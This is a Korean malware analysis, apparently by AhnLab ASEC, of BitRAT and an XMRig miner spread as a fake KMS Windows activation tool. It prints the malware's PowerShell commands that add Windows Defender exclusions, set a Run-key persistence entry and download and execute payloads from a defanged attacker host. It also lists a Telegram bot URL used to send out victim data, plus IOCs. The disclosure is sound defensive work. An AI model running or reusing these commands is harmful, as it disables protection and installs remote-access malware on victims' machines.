윈도우 정품 인증 툴을 이용해 유포 중인 BitRAT, XMRig 코인 마이너

ASEC 분석팀에서는 최근 윈도우 정품 인증 툴을 위장하여 BitRAT과 XMRig 코인 마이너가 유포 중인 것을 확인하였다. BitRAT은 아래의 블로그들에서 다룬 바와 같이 이전에도 웹하드를 통해 MS 윈도우 정품 인증 툴과 MS 오피스 설치 프로그램으로 위장하여 유포된 이력이 있으며, 현재 블로그에서 다루는 사례도 동일한 공격자로 추정된다. 특이한 점으로는 V3 설치되지 않은 환경에서는 BitRAT 원격제어툴이 설치되며, V3 설치 환경에서는 (BitRAT 가 아닌) 코인 마이너를 설치하는 기능이 존재한다.

최초 유포 사례는 확인되지 않지만 현재 기준 악성코드는 MediaFire라고 하는 파일 호스팅 사이트에 KMS 윈도우 정품 인증 툴을 위장한 압축 파일 형태로 업로드되어 있다.

[그림 1] 미디어파이어에 업로드된 악성코드

이렇게 업로드된 다운로드 주소는 아래와 같이 여러 국내 커뮤니티 사이트를 통해 공유되었다.

[그림 2] 국내 커뮤니티 자료실 게시글 – 1
[그림 3] 국내 커뮤니티 자료실 게시글 – 2

다운로드한 압축 파일을 풀면 다음과 같은 파일들을 확인할 수 있는데, “KMS Tools Unpack.exe” 파일이 위장한 실제 악성코드이다. “KMS Tools Unpack.exe”는 구체적으로 7z SFX 즉 실행 압축 파일이다.

[그림 4] 압축 파일 내부에 존재하는 악성코드

일반적인 압축 프로그램들처럼 7z도 SFX 포맷을 제공하는데 이를 사용해 압축하면 .zip이나 .z와 같은 압축 파일 대신 .exe라는 실행 파일이 생성된다. 실행하는 것 만으로도 제작자가 원하는 경로에 프로그램들을 설치 가능한 점 등 편하게 사용할 수 있기 때문에 주로 설치 프로그램에서 사용된다. 참고로 7z SFX는 단순하게 내부에 포함하고 있는 파일들을 설치하는 기능뿐만 아니라 추가적인 기능을 제공하는데, 이를 이용하면 설치 과정에서 특정 명령을 실행할 수 있다.

해당 악성코드는 일반적인 인스톨러 형태의 악성코드들과 달리 내부에 원본 악성코드가 존재하는 형태가 아니면 내부에는 실제 KMS 툴만 존재한다. 대신 다음과 같은 악의적인 명령들을 설치 과정에서 실행함으로써 추가 악성코드를 설치한다. 다음 명령들은 악성코드 설치 경로로 추정되는 특정 경로에 대해 윈도우 디펜더가 악성코드 검사를 하지 않도록 예외 경로로 추가하는 명령과 함께 외부에서 추가적인 악성코드를 다운로드해 실행하는 명령으로 나뉜다.

[그림 5] 7z SFX 실행 시 수행하는 악의적인 명령

파워쉘 명령을 보면 “KMS.msi” 즉 msi 포맷의 악성코드를 다운로드해 실행할 것으로 추정되지만 실제 다운로드되는 악성코드는 실행 파일 포맷이다. “KMS.msi” 또한 다운로더로서 실행 시 “vmtoolsd”, “asdmon” 프로세스가 현재 실행 중인지를 검사하여 존재할 경우 추가적인 악성코드를 설치하지 않는 Anti VM 및 Anti Sandbox 기능이 존재한다.

이후 다음 명령을 이용해 다운로드할 악성코드 경로 및 악성코드가 실행될 프로세스를 예외 경로 및 예외 프로세스로 등록한다.

> powershell.exe "-Command 
  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Temp'; 
  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe'; 
  Add-MpPreference -ExclusionProcess 'InstallUtil.exe'; 
  Add-MpPreference -ExclusionProcess 'software_reporter_tool.exe'; 
  Add-MpPreference -ExclusionProcess 'svchost.exe'; 
  Add-MpPreference -ExclusionPath 'C:\Users\[사용자 이름]\AppData\Local\Microsoft\Windows\INetCache\IE'"

다운로드되는 악성코드는 “%LOCALAPPDATA%\Google\software_reporter_tool.exe” 경로에 저장되는데 해당 경로를 Run 키에 등록하여 재부팅 이후에도 실행될 수 있도록 한다.

> cmd.exe "/c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run /v Google /t REG_SZ /d C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe /f"

“KMS.msi”는 또 다른 특징이 있는데, 사용자 환경에 V3가 설치된 경우와 그렇지 않을 경우에 따라 설치하는 악성코드가 다르다는 점이 그것이다. V3 설치 여부는 “ASDSvc” 프로세스가 현재 실행 중인지 여부로 결정한다.

[그림 6] V3 안티바이러스 제품의 유무에 따른 분기문

V3가 설치되어 있다면 “obieznne.msi”를, 아닐 경우에는 “wniavctm.msi”를 “%LOCALAPPDATA%\Google\software_reporter_tool.exe” 경로에 설치한다. 즉 실행된 악성코드는 구글 크롬 브라우저의 업데이트 프로그램으로 위장하여 실행 중이기 때문에 일반적인 사용자들로부터 의심스러운 프로세스로 인지하기 힘들 수 있다.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/obieznne.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe"
> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/wniavctm.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Google\software_reporter_tool.exe"

여기까지의 과정이 끝나면 “KMS_Tool.msi” 파일을 설치하는데 현재 다운로드가 불가하여 확인할 수 없지만 실제 KMS 툴로 추정된다.

> powershell.exe "Invoke-WebRequest hxxp://purposedesigns[.]net:443/KMS_Tool.msi -OutFile C:\Users\[사용자 이름]\AppData\Local\Temp\zxoeqxat.msi; cmd /c C:\Users\[사용자 이름]\AppData\Local\Temp\zxoeqxat.msi"

실제 KMS 툴이 설치되지 않다고 하더라도 사용자가 실행했던 “KMS Tools Unpack.exe” 파일이 삭제되고 동일한 아이콘을 갖는 KMS 툴이 “KMSTools.exe”라는 이름으로 생성된다. 이에 따라 사용자는 새롭게 생성된 KMS 툴을 사용할 수 있기 때문에 악성코드가 감염된 사실을 인지하기 힘들 것으로 추정된다.

[그림 7] 악성코드 실행 이후 생성된 KMS 툴

마지막으로 텔레그램 API를 이용해 감염 시스템의 기본적인 정보들을 전송한 후 자가 삭제한다.

[그림 8] 악성코드의 네트워크 통신
  • 감염 시스템 정보 전달에 사용되는 텔레그램 API : hxxps://api.telegram[.]org/bot5538205016:AAH7S9IGtFpb6RbC8W2TfNkjD7Cj_3qxCnI/sendMessage

위에서 V3의 설치 여부에 따라 다른 악성코드들이 설치되는 것을 알 수 있었다. V3가 존재하지 않는 환경에서 설치되는 “obieznne.msi”는 인젝터 악성코드로서 정상 프로그램인 InstallUtil.exe를 실행하고 원본 BitRAT을 인젝션한다. 즉 BitRAT은 InstallUtil 프로세스의 메모리 상에서 동작함으로써 정상 프로세스로 위장한다.

BitRAT은 다양한 기능을 제공하는 RAT 악성코드이며 시스템에 설치될 경우 공격자에게 프로세스 작업 / 서비스 작업 / 파일 작업 / 원격 명령 실행 등 감염 시스템에 대한 기본적인 제어 기능 외에도 다양한 정보 탈취 기능들과 HVNC, 원격 데스크탑, 코인 마이닝, 프록시들을 제공한다.

[그림 9] BitRAT C&C 통신

V3가 설치된 환경에서는 BitRAT 대신 XMRig 코인 마이너가 설치된다. XMRig 또한 정상 프로그램인 svchost.exe 프로세스의 메모리 상에서 동작하기 때문에 채굴로 인해 컴퓨터가 느려지더라도 일반적인 사용자는 인지하기 어려울 수 있다.

[그림 10] XMRig 코인 마이너
  • 마이닝 풀 URL : asia.randomx-hub.miningpoolhub[.]com:20580
  • User : “coinzz88.test”
  • Pass : “”

이와 같이 국내 자료 공유 사이트를 통해 악성코드가 활발하게 유포되고 있어 사용자의 주의가 필요하다. 자료 공유 사이트에서 다운로드한 실행 파일은 각별히 주의해야 하며, 유틸리티 및 게임 등의 프로그램은 반드시 공식 홈페이지에서 다운로드하는 것을 권장한다. 사용자들은 OS 및 인터넷 브라우저 등의 프로그램들에 대한 최신 패치 및 V3를 최신 버전으로 업데이트하여 이러한 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.

[파일 진단]
– Downloader/Win.Agent.C5222945 (2022.08.14.00)
– Downloader/Win.MSIL.R510666 (2022.08.14.03)
– Trojan/Win.Generic.C5223158 (2022.08.14.02)
– CoinMiner/Win.XMRig.C5223211 (2022.08.15.00)

[행위 진단]
– Execution/MDP.Powershell.M1185
– Malware/MDP.Download.M1197
– Malware/MDP.DriveByDownload.M1298
– Execution/MDP.Powershell.M4192

[IOC]
MD5

– 74120cfeca3b003c6dbf81707216c22c (인스톨러 – KMS Tools Unpack.exe)
– ce985a31420169f002706fb46d5e8cd0 (다운로더 – KMS.msi)
– d6cb1c1dd51917214ff41b76e904769e (BitRAT – obieznne.msi)
– 4e5cb75c3c99f30c7a22b940fd107505 (XMRig 코인 마이너 – wniavctm.msi)

다운로드 URL
– hxxp://purposedesigns[.]net:443/KMS.msi (다운로더)
– hxxp://purposedesigns[.]net:443/obieznne.msi (BitRAT)
– hxxp://purposedesigns[.]net:443/wniavctm.msi (XMRig 코인 마이너)

C&C
– 147.189.161[.]248:80 (BitRAT)

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.

Categories:악성코드 정보

Tagged as:, , ,

5 4 votes
별점 주기
guest
0 댓글
Inline Feedbacks
View all comments